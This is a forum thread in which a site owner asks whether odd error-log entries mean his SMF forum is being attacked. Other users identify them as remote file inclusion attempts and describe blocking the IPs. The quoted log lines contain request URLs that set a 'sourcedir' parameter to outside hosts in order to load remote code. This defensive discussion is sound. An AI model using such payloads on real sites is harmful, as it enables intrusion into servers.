Topic: Possible Hack or Attack?

[Ken (OP)]

Got a bunch of strange errors in the log:

Code: [Select]


http://www.ourfamilyforum.org/FamilyForum/index.php?topic=2600.0%20%20/?sourcedir=http://samaraeda.ru/File/id1?

8: Undefined variable: context

File: /home/kenkayjm/public_html/FamilyForum/Sources/Subs.php(1114) : runtime-created function
Line: 27
There's two pages of 'em... wonder if this is some kind of attempt at hacking the site?

[IchBin?]

Yes, that is an attempted hack. Shouldn't have to worry about it though, SMF cleans the URL's pretty good.

[Ken (OP)]

Looks like they're at it again today.

http://www.ourfamilyforum.org/FamilyForum/index.php?board=26.0///?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg???
8: Undefined index: board_note
File: /home/kenkayjm/public_html/FamilyForum/Themes/pandora20rc3/MessageIndex.template.php (main sub template - eval?)
Line: 183

[IchBin?]

I get them just about everyday myself. You should see the server logs with bots attempting to hack all sorts of different software.... I've been banning at my server firewall if any of them make more than just a few attempts. Getting tired of it though, and I'm about to write my own little java program to parse the logs and do it for me. lol

[Ken (OP)]

That might make a good app or mod for SMF users. 

[IchBin?]

That would be nice, but the type of program I would write would have to be run on the server, so it's not something most would have access too.

[Skhilled]

Yeah, anything with a 2nd URL after your own URL or has in the URL is a hack. They're trying to run a script from another site. Been battling that for a few years now since that Joomla/Mambo hacking a few years ago.

I'm with you, Brad. I usually block the IP on the server if they start to do it too much. I would be interested in seeing that JS program once you get started on it.

I've been wondering for quite awhile if there was a way to do it via a cron job...just never got around to exploring it.